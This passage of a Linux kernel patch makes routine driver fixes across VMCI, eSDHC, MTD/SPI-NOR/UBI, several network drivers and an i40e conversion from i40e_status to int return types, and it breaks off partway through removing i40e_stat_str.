+index 857b9851402a6..abe79f6fd2a79 100644
+--- a/drivers/misc/vmw_vmci/vmci_host.c
++++ b/drivers/misc/vmw_vmci/vmci_host.c
+@@ -165,10 +165,16 @@ static int vmci_host_close(struct inode *inode, struct file *filp)
+ static __poll_t vmci_host_poll(struct file *filp, poll_table *wait)
+ {
+ 	struct vmci_host_dev *vmci_host_dev = filp->private_data;
+-	struct vmci_ctx *context = vmci_host_dev->context;
++	struct vmci_ctx *context;
+ 	__poll_t mask = 0;
+ 
+ 	if (vmci_host_dev->ct_type == VMCIOBJ_CONTEXT) {
++		/*
++		 * Read context only if ct_type == VMCIOBJ_CONTEXT to make
++		 * sure that context is initialized
++		 */
++		context = vmci_host_dev->context;
++
+ 		/* Check for VMCI calls to this VM context. */
+ 		if (wait)
+ 			poll_wait(filp, &context->host_context.wait_queue,
+diff --git a/drivers/mmc/host/sdhci-of-esdhc.c b/drivers/mmc/host/sdhci-of-esdhc.c
+index 4712adac7f7c0..48ca1cf15b199 100644
+--- a/drivers/mmc/host/sdhci-of-esdhc.c
++++ b/drivers/mmc/host/sdhci-of-esdhc.c
+@@ -133,6 +133,7 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 			return ret;
+ 		}
+ 	}
++
+ 	/*
+ 	 * The DAT[3:0] line signal levels and the CMD line signal level are
+ 	 * not compatible with standard SDHC register. The line signal levels
+@@ -144,6 +145,16 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 		ret = value & 0x000fffff;
+ 		ret |= (value >> 4) & SDHCI_DATA_LVL_MASK;
+ 		ret |= (value << 1) & SDHCI_CMD_LVL;
++
++		/*
++		 * Some controllers have unreliable Data Line Active
++		 * bit for commands with busy signal. This affects
++		 * Command Inhibit (data) bit. Just ignore it since
++		 * MMC core driver has already polled card status
++		 * with CMD13 after any command with busy siganl.
++		 */
++		if (esdhc->quirk_ignore_data_inhibit)
++			ret &= ~SDHCI_DATA_INHIBIT;
+ 		return ret;
+ 	}
+ 
+@@ -158,19 +169,6 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 		return ret;
+ 	}
+ 
+-	/*
+-	 * Some controllers have unreliable Data Line Active
+-	 * bit for commands with busy signal. This affects
+-	 * Command Inhibit (data) bit. Just ignore it since
+-	 * MMC core driver has already polled card status
+-	 * with CMD13 after any command with busy siganl.
+-	 */
+-	if ((spec_reg == SDHCI_PRESENT_STATE) &&
+-	(esdhc->quirk_ignore_data_inhibit == true)) {
+-		ret = value & ~SDHCI_DATA_INHIBIT;
+-		return ret;
+-	}
+-
+ 	ret = value;
+ 	return ret;
+ }
+diff --git a/drivers/mtd/mtdcore.c b/drivers/mtd/mtdcore.c
+index 0feacb9fbdac5..0bc9676fe0299 100644
+--- a/drivers/mtd/mtdcore.c
++++ b/drivers/mtd/mtdcore.c
+@@ -888,8 +888,8 @@ static struct nvmem_device *mtd_otp_nvmem_register(struct mtd_info *mtd,
+ 
+ 	/* OTP nvmem will be registered on the physical device */
+ 	config.dev = mtd->dev.parent;
+-	config.name = kasprintf(GFP_KERNEL, "%s-%s", dev_name(&mtd->dev), compatible);
+-	config.id = NVMEM_DEVID_NONE;
++	config.name = compatible;
++	config.id = NVMEM_DEVID_AUTO;
+ 	config.owner = THIS_MODULE;
+ 	config.type = NVMEM_TYPE_OTP;
+ 	config.root_only = true;
+@@ -905,7 +905,6 @@ static struct nvmem_device *mtd_otp_nvmem_register(struct mtd_info *mtd,
+ 		nvmem = NULL;
+ 
+ 	of_node_put(np);
+-	kfree(config.name);
+ 
+ 	return nvmem;
+ }
+@@ -940,6 +939,7 @@ static int mtd_nvmem_fact_otp_reg_read(void *priv, unsigned int offset,
+ 
+ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ {
++	struct device *dev = mtd->dev.parent;
+ 	struct nvmem_device *nvmem;
+ 	ssize_t size;
+ 	int err;
+@@ -953,7 +953,7 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 			nvmem = mtd_otp_nvmem_register(mtd, "user-otp", size,
+ 						       mtd_nvmem_user_otp_reg_read);
+ 			if (IS_ERR(nvmem)) {
+-				dev_err(&mtd->dev, "Failed to register OTP NVMEM device\n");
++				dev_err(dev, "Failed to register OTP NVMEM device\n");
+ 				return PTR_ERR(nvmem);
+ 			}
+ 			mtd->otp_user_nvmem = nvmem;
+@@ -971,7 +971,7 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 			nvmem = mtd_otp_nvmem_register(mtd, "factory-otp", size,
+ 						       mtd_nvmem_fact_otp_reg_read);
+ 			if (IS_ERR(nvmem)) {
+-				dev_err(&mtd->dev, "Failed to register OTP NVMEM device\n");
++				dev_err(dev, "Failed to register OTP NVMEM device\n");
+ 				err = PTR_ERR(nvmem);
+ 				goto err;
+ 			}
+@@ -1023,10 +1023,14 @@ int mtd_device_parse_register(struct mtd_info *mtd, const char * const *types,
+ 
+ 	mtd_set_dev_defaults(mtd);
+ 
++	ret = mtd_otp_nvmem_add(mtd);
++	if (ret)
++		goto out;
++
+ 	if (IS_ENABLED(CONFIG_MTD_PARTITIONED_MASTER)) {
+ 		ret = add_mtd_device(mtd);
+ 		if (ret)
+-			return ret;
++			goto out;
+ 	}
+ 
+ 	/* Prefer parsed partitions over driver-provided fallback */
+@@ -1061,9 +1065,12 @@ int mtd_device_parse_register(struct mtd_info *mtd, const char * const *types,
+ 		register_reboot_notifier(&mtd->reboot_notifier);
+ 	}
+ 
+-	ret = mtd_otp_nvmem_add(mtd);
+-
+ out:
++	if (ret) {
++		nvmem_unregister(mtd->otp_user_nvmem);
++		nvmem_unregister(mtd->otp_factory_nvmem);
++	}
++
+ 	if (ret && device_is_registered(&mtd->dev))
+ 		del_mtd_device(mtd);
+ 
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 4244c6fd98111..bf50a35db711e 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2733,6 +2733,7 @@ static int spi_nor_quad_enable(struct spi_nor *nor)
+ 
+ static int spi_nor_init(struct spi_nor *nor)
+ {
++	struct spi_nor_flash_parameter *params = nor->params;
+ 	int err;
+ 
+ 	err = spi_nor_octal_dtr_enable(nor, true);
+@@ -2774,9 +2775,10 @@ static int spi_nor_init(struct spi_nor *nor)
+ 		 */
+ 		WARN_ONCE(nor->flags & SNOR_F_BROKEN_RESET,
+ 			  "enabling reset hack; may not recover from unexpected reboots\n");
+-		err = nor->params->set_4byte_addr_mode(nor, true);
++		err = params->set_4byte_addr_mode(nor, true);
+ 		if (err && err != -ENOTSUPP)
+ 			return err;
++		params->addr_mode_nbytes = 4;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/mtd/ubi/eba.c b/drivers/mtd/ubi/eba.c
+index 09c408c45a621..4e1d80746b04b 100644
+--- a/drivers/mtd/ubi/eba.c
++++ b/drivers/mtd/ubi/eba.c
+@@ -946,7 +946,7 @@ static int try_write_vid_and_data(struct ubi_volume *vol, int lnum,
+ 				  int offset, int len)
+ {
+ 	struct ubi_device *ubi = vol->ubi;
+-	int pnum, opnum, err, vol_id = vol->vol_id;
++	int pnum, opnum, err, err2, vol_id = vol->vol_id;
+ 
+ 	pnum = ubi_wl_get_peb(ubi);
+ 	if (pnum < 0) {
+@@ -981,10 +981,19 @@ static int try_write_vid_and_data(struct ubi_volume *vol, int lnum,
+ out_put:
+ 	up_read(&ubi->fm_eba_sem);
+ 
+-	if (err && pnum >= 0)
+-		err = ubi_wl_put_peb(ubi, vol_id, lnum, pnum, 1);
+-	else if (!err && opnum >= 0)
+-		err = ubi_wl_put_peb(ubi, vol_id, lnum, opnum, 0);
++	if (err && pnum >= 0) {
++		err2 = ubi_wl_put_peb(ubi, vol_id, lnum, pnum, 1);
++		if (err2) {
++			ubi_warn(ubi, "failed to return physical eraseblock %d, error %d",
++				 pnum, err2);
++		}
++	} else if (!err && opnum >= 0) {
++		err2 = ubi_wl_put_peb(ubi, vol_id, lnum, opnum, 0);
++		if (err2) {
++			ubi_warn(ubi, "failed to return physical eraseblock %d, error %d",
++				 opnum, err2);
++		}
++	}
+ 
+ 	return err;
+ }
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index 2f224b166bbb3..f7944fe2e0ba7 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -1427,7 +1427,6 @@ static void qca8k_pcs_get_state(struct phylink_pcs *pcs,
+ 
+ 	state->link = !!(reg & QCA8K_PORT_STATUS_LINK_UP);
+ 	state->an_complete = state->link;
+-	state->an_enabled = !!(reg & QCA8K_PORT_STATUS_LINK_AUTO);
+ 	state->duplex = (reg & QCA8K_PORT_STATUS_DUPLEX) ? DUPLEX_FULL :
+ 							   DUPLEX_HALF;
+ 
+diff --git a/drivers/net/ethernet/amd/nmclan_cs.c b/drivers/net/ethernet/amd/nmclan_cs.c
+index 823a329a921f4..0dd391c84c138 100644
+--- a/drivers/net/ethernet/amd/nmclan_cs.c
++++ b/drivers/net/ethernet/amd/nmclan_cs.c
+@@ -651,7 +651,7 @@ static int nmclan_config(struct pcmcia_device *link)
+     } else {
+       pr_notice("mace id not found: %x %x should be 0x40 0x?9\n",
+ 		sig[0], sig[1]);
+-      return -ENODEV;
++      goto failed;
+     }
+   }
+ 
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index 027fff9f7db07..48ec323e0a920 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -295,7 +295,8 @@ static int dpaa_stop(struct net_device *net_dev)
+ {
+ 	struct mac_device *mac_dev;
+ 	struct dpaa_priv *priv;
+-	int i, err, error;
++	int i, error;
++	int err = 0;
+ 
+ 	priv = netdev_priv(net_dev);
+ 	mac_dev = priv->mac_dev;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h
+index 60e351665c707..e789729a9cfba 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e.h
++++ b/drivers/net/ethernet/intel/i40e/i40e.h
+@@ -1287,9 +1287,9 @@ void i40e_ptp_stop(struct i40e_pf *pf);
+ int i40e_ptp_alloc_pins(struct i40e_pf *pf);
+ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset);
+ int i40e_is_vsi_uplink_mode_veb(struct i40e_vsi *vsi);
+-i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf);
+-i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf);
+-i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf);
++int i40e_get_partition_bw_setting(struct i40e_pf *pf);
++int i40e_set_partition_bw_setting(struct i40e_pf *pf);
++int i40e_commit_partition_bw_setting(struct i40e_pf *pf);
+ void i40e_print_link_message(struct i40e_vsi *vsi, bool isup);
+ 
+ void i40e_set_fec_in_flags(u8 fec_cfg, u32 *flags);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_adminq.c b/drivers/net/ethernet/intel/i40e/i40e_adminq.c
+index 42439f725aa43..86fac8f959bb0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_adminq.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_adminq.c
+@@ -47,9 +47,9 @@ static void i40e_adminq_init_regs(struct i40e_hw *hw)
+  *  i40e_alloc_adminq_asq_ring - Allocate Admin Queue send rings
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
++static int i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	ret_code = i40e_allocate_dma_mem(hw, &hw->aq.asq.desc_buf,
+ 					 i40e_mem_atq_ring,
+@@ -74,9 +74,9 @@ static i40e_status i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
+  *  i40e_alloc_adminq_arq_ring - Allocate Admin Queue receive rings
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_adminq_arq_ring(struct i40e_hw *hw)
++static int i40e_alloc_adminq_arq_ring(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	ret_code = i40e_allocate_dma_mem(hw, &hw->aq.arq.desc_buf,
+ 					 i40e_mem_arq_ring,
+@@ -115,11 +115,11 @@ static void i40e_free_adminq_arq(struct i40e_hw *hw)
+  *  i40e_alloc_arq_bufs - Allocate pre-posted buffers for the receive queue
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_arq_bufs(struct i40e_hw *hw)
++static int i40e_alloc_arq_bufs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_aq_desc *desc;
+ 	struct i40e_dma_mem *bi;
++	int ret_code;
+ 	int i;
+ 
+ 	/* We'll be allocating the buffer info memory first, then we can
+@@ -182,10 +182,10 @@ unwind_alloc_arq_bufs:
+  *  i40e_alloc_asq_bufs - Allocate empty buffer structs for the send queue
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_asq_bufs(struct i40e_hw *hw)
++static int i40e_alloc_asq_bufs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_dma_mem *bi;
++	int ret_code;
+ 	int i;
+ 
+ 	/* No mapped memory needed yet, just the buffer info structures */
+@@ -266,9 +266,9 @@ static void i40e_free_asq_bufs(struct i40e_hw *hw)
+  *
+  *  Configure base address and length registers for the transmit queue
+  **/
+-static i40e_status i40e_config_asq_regs(struct i40e_hw *hw)
++static int i40e_config_asq_regs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg = 0;
+ 
+ 	/* Clear Head and Tail */
+@@ -295,9 +295,9 @@ static i40e_status i40e_config_asq_regs(struct i40e_hw *hw)
+  *
+  * Configure base address and length registers for the receive (event queue)
+  **/
+-static i40e_status i40e_config_arq_regs(struct i40e_hw *hw)
++static int i40e_config_arq_regs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg = 0;
+ 
+ 	/* Clear Head and Tail */
+@@ -334,9 +334,9 @@ static i40e_status i40e_config_arq_regs(struct i40e_hw *hw)
+  *  Do *NOT* hold the lock when calling this as the memory allocation routines
+  *  called are not going to be atomic context safe
+  **/
+-static i40e_status i40e_init_asq(struct i40e_hw *hw)
++static int i40e_init_asq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->aq.asq.count > 0) {
+ 		/* queue already initialized */
+@@ -393,9 +393,9 @@ init_adminq_exit:
+  *  Do *NOT* hold the lock when calling this as the memory allocation routines
+  *  called are not going to be atomic context safe
+  **/
+-static i40e_status i40e_init_arq(struct i40e_hw *hw)
++static int i40e_init_arq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->aq.arq.count > 0) {
+ 		/* queue already initialized */
+@@ -445,9 +445,9 @@ init_adminq_exit:
+  *
+  *  The main shutdown routine for the Admin Send Queue
+  **/
+-static i40e_status i40e_shutdown_asq(struct i40e_hw *hw)
++static int i40e_shutdown_asq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 
+@@ -479,9 +479,9 @@ shutdown_asq_out:
+  *
+  *  The main shutdown routine for the Admin Receive Queue
+  **/
+-static i40e_status i40e_shutdown_arq(struct i40e_hw *hw)
++static int i40e_shutdown_arq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	mutex_lock(&hw->aq.arq_mutex);
+ 
+@@ -582,12 +582,12 @@ static void i40e_set_hw_flags(struct i40e_hw *hw)
+  *     - hw->aq.arq_buf_size
+  *     - hw->aq.asq_buf_size
+  **/
+-i40e_status i40e_init_adminq(struct i40e_hw *hw)
++int i40e_init_adminq(struct i40e_hw *hw)
+ {
+ 	u16 cfg_ptr, oem_hi, oem_lo;
+ 	u16 eetrack_lo, eetrack_hi;
+-	i40e_status ret_code;
+ 	int retry = 0;
++	int ret_code;
+ 
+ 	/* verify input for valid configuration */
+ 	if ((hw->aq.num_arq_entries == 0) ||
+@@ -780,7 +780,7 @@ static bool i40e_asq_done(struct i40e_hw *hw)
+  *  This is the main send command driver routine for the Admin Queue send
+  *  queue.  It runs the queue, cleans the queue, etc
+  **/
+-static i40e_status
++static int
+ i40e_asq_send_command_atomic_exec(struct i40e_hw *hw,
+ 				  struct i40e_aq_desc *desc,
+ 				  void *buff, /* can be NULL */
+@@ -788,12 +788,12 @@ i40e_asq_send_command_atomic_exec(struct i40e_hw *hw,
+ 				  struct i40e_asq_cmd_details *cmd_details,
+ 				  bool is_atomic_context)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_dma_mem *dma_buff = NULL;
+ 	struct i40e_asq_cmd_details *details;
+ 	struct i40e_aq_desc *desc_on_ring;
+ 	bool cmd_completed = false;
+ 	u16  retval = 0;
++	int status = 0;
+ 	u32  val = 0;
+ 
+ 	if (hw->aq.asq.count == 0) {
+@@ -984,7 +984,7 @@ asq_send_command_error:
+  *  Acquires the lock and calls the main send command execution
+  *  routine.
+  **/
+-i40e_status
++int
+ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 			     struct i40e_aq_desc *desc,
+ 			     void *buff, /* can be NULL */
+@@ -992,7 +992,7 @@ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 			     struct i40e_asq_cmd_details *cmd_details,
+ 			     bool is_atomic_context)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 	status = i40e_asq_send_command_atomic_exec(hw, desc, buff, buff_size,
+@@ -1003,7 +1003,7 @@ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-i40e_status
++int
+ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 		      void *buff, /* can be NULL */ u16  buff_size,
+ 		      struct i40e_asq_cmd_details *cmd_details)
+@@ -1026,7 +1026,7 @@ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+  *  routine. Returns the last Admin Queue status in aq_status
+  *  to avoid race conditions in access to hw->aq.asq_last_status.
+  **/
+-i40e_status
++int
+ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				struct i40e_aq_desc *desc,
+ 				void *buff, /* can be NULL */
+@@ -1035,7 +1035,7 @@ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				bool is_atomic_context,
+ 				enum i40e_admin_queue_err *aq_status)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 	status = i40e_asq_send_command_atomic_exec(hw, desc, buff,
+@@ -1048,7 +1048,7 @@ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-i40e_status
++int
+ i40e_asq_send_command_v2(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 			 void *buff, /* can be NULL */ u16  buff_size,
+ 			 struct i40e_asq_cmd_details *cmd_details,
+@@ -1084,14 +1084,14 @@ void i40e_fill_default_direct_cmd_desc(struct i40e_aq_desc *desc,
+  *  the contents through e.  It can also return how many events are
+  *  left to process through 'pending'
+  **/
+-i40e_status i40e_clean_arq_element(struct i40e_hw *hw,
+-					     struct i40e_arq_event_info *e,
+-					     u16 *pending)
++int i40e_clean_arq_element(struct i40e_hw *hw,
++			   struct i40e_arq_event_info *e,
++			   u16 *pending)
+ {
+-	i40e_status ret_code = 0;
+ 	u16 ntc = hw->aq.arq.next_to_clean;
+ 	struct i40e_aq_desc *desc;
+ 	struct i40e_dma_mem *bi;
++	int ret_code = 0;
+ 	u16 desc_idx;
+ 	u16 datalen;
+ 	u16 flags;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_alloc.h b/drivers/net/ethernet/intel/i40e/i40e_alloc.h
+index cb8689222c8b7..a6c9a9e343d11 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_alloc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_alloc.h
+@@ -20,16 +20,16 @@ enum i40e_memory_type {
+ };
+ 
+ /* prototype for functions used for dynamic memory allocation */
+-i40e_status i40e_allocate_dma_mem(struct i40e_hw *hw,
+-					    struct i40e_dma_mem *mem,
+-					    enum i40e_memory_type type,
+-					    u64 size, u32 alignment);
+-i40e_status i40e_free_dma_mem(struct i40e_hw *hw,
+-					struct i40e_dma_mem *mem);
+-i40e_status i40e_allocate_virt_mem(struct i40e_hw *hw,
+-					     struct i40e_virt_mem *mem,
+-					     u32 size);
+-i40e_status i40e_free_virt_mem(struct i40e_hw *hw,
+-					 struct i40e_virt_mem *mem);
++int i40e_allocate_dma_mem(struct i40e_hw *hw,
++			  struct i40e_dma_mem *mem,
++			  enum i40e_memory_type type,
++			  u64 size, u32 alignment);
++int i40e_free_dma_mem(struct i40e_hw *hw,
++		      struct i40e_dma_mem *mem);
++int i40e_allocate_virt_mem(struct i40e_hw *hw,
++			   struct i40e_virt_mem *mem,
++			   u32 size);
++int i40e_free_virt_mem(struct i40e_hw *hw,
++		       struct i40e_virt_mem *mem);
+ 
+ #endif /* _I40E_ALLOC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_client.c b/drivers/net/ethernet/intel/i40e/i40e_client.c
+index 10d7a982a5b9b..8bcb98b85e3d9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_client.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_client.c
+@@ -541,7 +541,7 @@ static int i40e_client_virtchnl_send(struct i40e_info *ldev,
+ {
+ 	struct i40e_pf *pf = ldev->pf;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status err;
++	int err;
+ 
+ 	err = i40e_aq_send_msg_to_vf(hw, vf_id, VIRTCHNL_OP_IWARP,
+ 				     0, msg, len, NULL);
+@@ -674,7 +674,7 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_vsi_context ctxt;
+ 	bool update = true;
+-	i40e_status err;
++	int err;
+ 
+ 	/* TODO: for now do not allow setting VF's VSI setting */
+ 	if (is_vf)
+@@ -686,8 +686,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -714,8 +714,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 		err = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 		if (err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "update VSI ctxt for PE failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++				 "update VSI ctxt for PE failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_common.c b/drivers/net/ethernet/intel/i40e/i40e_common.c
+index 8f764ff5c990f..ed88e38d488b2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_common.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_common.c
+@@ -14,9 +14,9 @@
+  * This function sets the mac type of the adapter based on the
+  * vendor ID and device ID stored in the hw structure.
+  **/
+-i40e_status i40e_set_mac_type(struct i40e_hw *hw)
++int i40e_set_mac_type(struct i40e_hw *hw)
+ {
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	if (hw->vendor_id == PCI_VENDOR_ID_INTEL) {
+ 		switch (hw->device_id) {
+@@ -124,154 +124,6 @@ const char *i40e_aq_str(struct i40e_hw *hw, enum i40e_admin_queue_err aq_err)
+ 	return hw->err_str;
+ }
+ 
+-/**
+- * i40e_stat_str - convert status err code to a string
+- * @hw: pointer to the HW structure
+- * @stat_err: the status error code to convert
+- **/
+-const char *i40e_stat_str(struct i40e_hw *hw, i40e_status stat_err)
+-{
+-	switch (stat_err) {
+-	case 0:
+-		return "OK";
+-	case I40E_ERR_NVM:
+-		return "I40E_ERR_NVM";
+-	case I40E_ERR_NVM_CHECKSUM:
+-		return "I40E_ERR_NVM_CHECKSUM";
+-	case I40E_ERR_PHY:
+-		return "I40E_ERR_PHY";
+-	case I40E_ERR_CONFIG:
+-		return "I40E_ERR_CONFIG";
+-	case I40E_ERR_PARAM:
+-		return "I40E_ERR_PARAM";
+-	case I40E_ERR_MAC_TYPE:
+-		return "I40E_ERR_MAC_TYPE";
+-	case I40E_ERR_UNKNOWN_PHY:
+-		return "I40E_ERR_UNKNOWN_PHY";
+-	case I40E_ERR_LINK_SETUP:
+-		return "I40E_ERR_LINK_SETUP";
+-	case I40E_ERR_ADAPTER_STOPPED:
+-		return "I40E_ERR_ADAPTER_STOPPED";
+-	case I40E_ERR_INVALID_MAC_ADDR:
+-		return "I40E_ERR_INVALID_MAC_ADDR";
+-	case I40E_ERR_DEVICE_NOT_SUPPORTED:
+-		return "I40E_ERR_DEVICE_NOT_SUPPORTED";
+-	case I40E_ERR_PRIMARY_REQUESTS_PENDING:
+-		return "I40E_ERR_PRIMARY_REQUESTS_PENDING";
+-	case I40E_ERR_INVALID_LINK_SETTINGS:
+-		return "I40E_ERR_INVALID_LINK_SETTINGS";
+-	case I40E_ERR_AUTONEG_NOT_COMPLETE:
+-		return "I40E_ERR_AUTONEG_NOT_COMPLETE";
+-	case I40E_ERR_RESET_FAILED:
+-		return "I40E_ERR_RESET_FAILED";
+-	case I40E_ERR_SWFW_SYNC:
+-		return "I40E_ERR_SWFW_SYNC";
+-	case I40E_ERR_NO_AVAILABLE_VSI:
+-		return "I40E_ERR_NO_AVAILABLE_VSI";
+-	case I40E_ERR_NO_MEMORY:
+-		return "I40E_ERR_NO_MEMORY";
+-	case I40E_ERR_BAD_PTR:
+-		return "I40E_ERR_BAD_PTR";
+-	case I40E_ERR_RING_FULL:
+-		return "I40E_ERR_RING_FULL";
+-	case I40E_ERR_INVALID_PD_ID:
+-		return "I40E_ERR_INVALID_PD_ID";
+-	case I40E_ERR_INVALID_QP_ID:
+-		return "I40E_ERR_INVALID_QP_ID";
+-	case I40E_ERR_INVALID_CQ_ID:
+-		return "I40E_ERR_INVALID_CQ_ID";
+-	case I40E_ERR_INVALID_CEQ_ID:
+-		return "I40E_ERR_INVALID_CEQ_ID";
+-	case I40E_ERR_INVALID_AEQ_ID:
+-		return "I40E_ERR_INVALID_AEQ_ID";
+-	case I40E_ERR_INVALID_SIZE:
+-		return "I40E_ERR_INVALID_SIZE";
+-	case I40E_ERR_INVALID_ARP_INDEX:
+-		return "I40E_ERR_INVALID_ARP_INDEX";
+-	case I40E_ERR_INVALID_FPM_FUNC_ID:
+-		return "I40E_ERR_INVALID_FPM_FUNC_ID";
+-	case I40E_ERR_QP_INVALID_MSG_SIZE:
+-		return "I40E_ERR_QP_INVALID_MSG_SIZE";
+-	case I40E_ERR_QP_TOOMANY_WRS_POSTED:
+-		return "I40E_ERR_QP_TOOMANY_WRS_POSTED";
+-	case I40E_ERR_INVALID_FRAG_COUNT:
+-		return "I40E_ERR_INVALID_FRAG_COUNT";
+-	case I40E_ERR_QUEUE_EMPTY:
+-		return "I40E_ERR_QUEUE_EMPTY";
+-	case I40E_ERR_INVALID_ALIGNMENT:
+-		return "I40E_ERR_INVALID_ALIGNMENT";
+-	case I40E_ERR_FLUSHED_QUEUE:
+-		return "I40E_ERR_FLUSHED_QUEUE";
+-	case I40E_ERR_INVALID_PUSH_PAGE_INDEX:
+-		return "I40E_ERR_INVALID_PUSH_PAGE_INDEX";
+-	case I40E_ERR_INVALID_IMM_DATA_SIZE:
+-		return "I40E_ERR_INVALID_IMM_DATA_SIZE";
+-	case I40E_ERR_TIMEOUT:
+-		return "I40E_ERR_TIMEOUT";
+-	case I40E_ERR_OPCODE_MISMATCH:
+-		return "I40E_ERR_OPCODE_MISMATCH";
+-	case I40E_ERR_CQP_COMPL_ERROR:
+-		return "I40E_ERR_CQP_COMPL_ERROR";
+-	case I40E_ERR_INVALID_VF_ID:
+-		return "I40E_ERR_INVALID_VF_ID";
+-	case I40E_ERR_INVALID_HMCFN_ID:
+-		return "I40E_ERR_INVALID_HMCFN_ID";
+-	case I40E_ERR_BACKING_PAGE_ERROR:
+-		return "I40E_ERR_BACKING_PAGE_ERROR";
+-	case I40E_ERR_NO_PBLCHUNKS_AVAILABLE:
+-		return "I40E_ERR_NO_PBLCHUNKS_AVAILABLE";
+-	case I40E_ERR_INVALID_PBLE_INDEX:
+-		return "I40E_ERR_INVALID_PBLE_INDEX";
+-	case I40E_ERR_INVALID_SD_INDEX:
+-		return "I40E_ERR_INVALID_SD_INDEX";
+-	case I40E_ERR_INVALID_PAGE_DESC_INDEX:
+-		return "I40E_ERR_INVALID_PAGE_DESC_INDEX";
+-	case I40E_ERR_INVALID_SD_TYPE:
